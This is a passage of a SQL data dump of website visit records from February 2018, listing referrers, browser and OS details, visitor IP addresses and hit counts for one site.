'000',2,0),(18411,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.182','000',1,0),(18412,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.180','000',1,0),(18413,'2018-02-01','https://www.google.com/','Safari','iPhone','11.0','','107.77.234.26','000',3,0),(18414,'2018-02-01','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',1,0),(18415,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',2,0),(18416,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',1,0),(18417,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(18418,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(18419,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',3,0),(18420,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',1,0),(18421,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',1,0),(18422,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.53','000',2,0),(18423,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.147','000',1,0),(18424,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.203','000',1,0),(18425,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.220','000',1,0),(18426,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',3,0),(18427,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.170','000',4,0),(18428,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',1,0),(18429,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',2,0),(18430,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',1,0),(18431,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',2,0),(18432,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',1,0),(18433,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.27','000',1,0),(18434,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.209','000',1,0),(18435,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.149','000',2,0),(18436,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.225','000',1,0),(18437,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.176','000',1,0),(18438,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.50','000',4,0),(18439,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.146','000',1,0),(18440,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.32','000',1,0),(18441,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(18442,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.17','000',1,0),(18443,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',1,0),(18444,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',1,0),(18445,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',3,0),(18446,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',1,0),(18447,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',2,0),(18448,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.71','000',1,0),(18449,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',2,0),(18450,'2018-02-01','https://zphiblgz.org/scholarship/recommendation/','Safari','iPad','11.0','','68.134.9.53','000',2,0),(18451,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.121.139.250','000',1,0),(18452,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',1,0),(18453,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',3,0),(18454,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',1,0),(18455,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',2,0),(18456,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',1,0),(18457,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.115','000',1,0),(18458,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(18459,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',3,0),(18460,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',2,0),(18461,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(18462,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',1,0),(18463,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',1,0),(18464,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(18465,'2018-02-01','https://www.google.com/','Safari','Macintosh','11.0','','209.2.211.254','000',2,0),(18466,'2018-02-01','https://www.google.com/','Chrome','Windows','63.0.3239.132','','71.121.235.128','000',6,0),(18467,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',1,0),(18468,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',1,0),(18469,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',2,0),(18470,'2018-02-01','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(18471,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(18472,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',1,0),(18473,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.216','000',1,0),(18474,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',2,0),(18475,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(18476,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.28','000',3,0),(18477,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.141','000',1,0),(18478,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',1,0),(18479,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.100','000',1,0),(18480,'2018-02-01','https://zphiblgz.org','Firefox','Linux','39.0','','192.186.168.236','000',2,0),(18481,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',1,0),(18482,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',1,0),(18483,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.217','000',3,0),(18484,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',1,0),(18485,'2018-02-01','https://zphiblgz.org','Safari','iPhone','604.4.7','','98.233.249.231','000',2,0),(18486,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',2,0),(18487,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',1,0),(18488,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',2,0),(18489,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',1,0),(18490,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.209','000',1,0),(18491,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.176','000',1,0),(18492,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',1,0),(18493,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',2,0),(18494,'2018-02-01','https://zphiblgz.org','Opera','Unknown','9.15','','207.248.251.82','000',1,0),(18495,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',1,0),(18496,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',1,0),(18497,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.218','000',1,0),(18498,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',1,0),(18499,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',2,0),(18500,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(18501,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(18502,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.217','000',1,0),(18503,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.227','000',2,0),(18504,'2018-02-01','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',3,0),(18505,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',1,0),(18506,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',1,0),(18507,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',1,0),(18508,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',1,0),(18509,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',1,0),(18510,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.4','000',1,0),(18511,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',4,0),(18512,'2018-02-01','https://zphiblgz.org','Chrome','iPhone','64.0.3282.112','','71.114.37.67','000',3,0),(18513,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',1,0),(18514,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.6','000',1,0),(18515,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',1,0),(18516,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',3,0),(18517,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(18518,'2018-02-01','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.244.204.170','000',2,0),(18519,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',2,0),(18520,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.204','000',1,0),(18521,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',2,0),(18522,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',2,0),(18523,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.107','000',1,0),(18524,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(18525,'2018-02-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',1,0),(18526,'2018-02-01','http://site.ru','Chrome','Windows','5.0.375.99','','103.26.40.75','000',1,0),(18527,'2018-02-02','https://www.google.com/','Safari','iPhone','9.0','','174.205.14.117','000',2,0),(18528,'2018-02-02','https://zphiblgz.org','Firefox','Windows','40.1','','80.12.161.22','000',2,0),(18529,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.211','000',2,0),(18530,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',2,0),(18531,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',2,0),(18532,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.193','000',1,0),(18533,'2018-02-02','https://zphiblgz.org','Firefox','Windows','40.1','','86.120.40.101','000',2,0),(18534,'2018-02-02','https://zphiblgz.org','Firefox','Windows','50.0','','192.187.115.90','000',2,0),(18535,'2018-02-02','https://zphiblgz.org','Firefox','Windows','40.1','','180.191.61.2','000',1,0),(18536,'2018-02-02','https://zphiblgz.org','Firefox','Windows','40.1','','180.191.151.126','000',1,0),(18537,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',4,0),(18538,'2018-02-02','http://zphiblgz.org/','Firefox','Windows','45.67.20','','46.174.114.209','000',2,0),(18539,'2018-02-02','https://www.google.com/','SamsungBrowser','Android','6.2','','208.54.35.152','000',2,0),(18540,'2018-02-02','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(18541,'2018-02-02','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(18542,'2018-02-02','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','156.40.216.20','000',19,0),(18543,'2018-02-02','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.28','000',1,0),(18544,'2018-02-02','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(18545,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.58','000',13,0),(18546,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',2,0),(18547,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',3,0),(18548,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',3,0),(18549,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.108','000',1,0),(18550,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',2,0),(18551,'2018-02-02','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.29','000',1,0),(18552,'2018-02-02','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.99.141.70','000',2,0),(18553,'2018-02-02','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.32','000',1,0),(18554,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',1,0),(18555,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.218','000',1,0),(18556,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',1,0),(18557,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',6,0),(18558,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',1,0),(18559,'2018-02-02','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.18','000',1,0),(18560,'2018-02-02','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',6,0),(18561,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.113','000',3,0),(18562,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.164','000',2,0),(18563,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.69','000',2,0),(18564,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',1,0),(18565,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',1,0),(18566,'2018-02-02','https://zphiblgz.org','Safari','iPhone','11.0','','173.67.16.175','000',4,0),(18567,'2018-02-02','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.139','000',3,0),(18568,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',1,0),(18569,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.132','000',1,0),(18570,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.115','000',1,0),(18571,'2018-02-02','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(18572,'2018-02-02','https://zphiblgz.org/','Edge','Windows','16.16299','','149.202.50.209','000',1,0),(18573,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',2,0),(18574,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',2,0),(18575,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',1,0),(18576,'2018-02-02','https://mailchi.mp/','Firefox','Macintosh','52.0','','50.225.39.81','000',3,0),(18577,'2018-02-02','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(18578,'2018-02-02','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(18579,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.35','000',1,0),(18580,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',3,0),(18581,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.185','000',1,0),(18582,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.185','000',1,0),(18583,'2018-02-02','https://zphiblgz.org/','Chrome','Macintosh','63.0.3239.132','','189.122.1.117','000',2,0),(18584,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',3,0),(18585,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.195','000',2,0),(18586,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.116','000',1,0),(18587,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',2,0),(18588,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',2,0),(18589,'2018-02-02','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','192.198.80.227','000',3,0),(18590,'2018-02-02','https://zphiblgz.org','Firefox','Windows','17.0','','83.166.242.112','000',1,0),(18591,'2018-02-02','https://zphiblgz.org','Firefox','Windows','58.0','','198.51.197.42','000',2,0),(18592,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',3,0),(18593,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(18594,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(18595,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',2,0),(18596,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',1,0),(18597,'2018-02-02','http://www.zphiblgz.org/','MSIE','Windows','6.0','','91.215.188.105','000',2,0),(18598,'2018-02-02','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(18599,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.70','000',1,0),(18600,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',1,0),(18601,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.217','000',1,0),(18602,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',1,0),(18603,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',1,0),(18604,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',1,0),(18605,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.120','000',1,0),(18606,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',3,0),(18607,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.208','000',1,0),(18608,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.19','000',1,0),(18609,'2018-02-02','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(18610,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',1,0),(18611,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.153','000',1,0),(18612,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.171','000',1,0),(18613,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.56','000',1,0),(18614,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(18615,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',1,0),(18616,'2018-02-02','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(18617,'2018-02-02','http://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','188.165.4.128','000',2,0),(18618,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.80','000',1,0),(18619,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.85','000',1,0),(18620,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.114','000',1,0),(18621,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.81','000',2,0),(18622,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.72','000',2,0),(18623,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.165','000',1,0),(18624,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',2,0),(18625,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',1,0),(18626,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',2,0),(18627,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.15','000',1,0),(18628,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',3,0),(18629,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.21','000',3,0),(18630,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(18631,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',1,0),(18632,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.117','000',1,0),(18633,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.116','000',3,0),(18634,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.205','000',2,0),(18635,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.59','000',1,0),(18636,'2018-02-02','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.29','000',1,0),(18637,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',1,0),(18638,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.209','000',1,0),(18639,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.82','000',1,0),(18640,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.87','000',2,0),(18641,'2018-02-02','https://zphiblgz.org','Safari','iPhone','9.0','','221.205.137.123','000',1,0),(18642,'2018-02-02','https://zphiblgz.org','Safari','iPhone','9.0','','124.88.64.209','000',1,0),(18643,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',1,0),(18644,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',2,0),(18645,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',1,0),(18646,'2018-02-02','https://zphiblgz.org','Opera','Windows','12.00','','183.240.92.134','000',1,0),(18647,'2018-02-02','https://zphiblgz.org','Safari','Macintosh','5.1','','67.237.34.186','000',1,0),(18648,'2018-02-02','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','45.57.172.158','000',2,0),(18649,'2018-02-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(18650,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.115','000',1,0),(18651,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',1,0),(18652,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.71','000',2,0),(18653,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.119','000',2,0),(18654,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.57','000',1,0),(18655,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',3,0),(18656,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.218','000',3,0),(18657,'2018-02-02','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(18658,'2018-02-02','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjZ8eH5iojZAhUjq1kKHfOEBrUQFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','170.121.14.11','000',4,0),(18659,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.232','000',1,0),(18660,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',1,0),(18661,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',4,0),(18662,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.211','000',1,0),(18663,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',1,0),(18664,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',1,0),(18665,'2018-02-02','https://zphiblgz.org','Safari','iPhone','9.0','','58.48.29.229','000',1,0),(18666,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.55','000',1,0),(18667,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.64','000',1,0),(18668,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.113','000',1,0),(18669,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.205','000',1,0),(18670,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.87','000',1,0),(18671,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.84','000',1,0),(18672,'2018-02-02','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','208.76.113.2','000',3,0),(18673,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',1,0),(18674,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',2,0),(18675,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(18676,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.251','000',2,0),(18677,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.57','000',1,0),(18678,'2018-02-02','https://zphiblgz.org','Firefox','Windows','40.1','','188.2.118.121','000',2,0),(18679,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.30','000',1,0),(18680,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.130','000',1,0),(18681,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.142','000',1,0),(18682,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.74','000',1,0),(18683,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.87','000',1,0),(18684,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.38','000',1,0),(18685,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',2,0),(18686,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',2,0),(18687,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(18688,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.87','000',1,0),(18689,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.23','000',1,0),(18690,'2018-02-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.204','000',1,0),(18691,'2018-02-02','h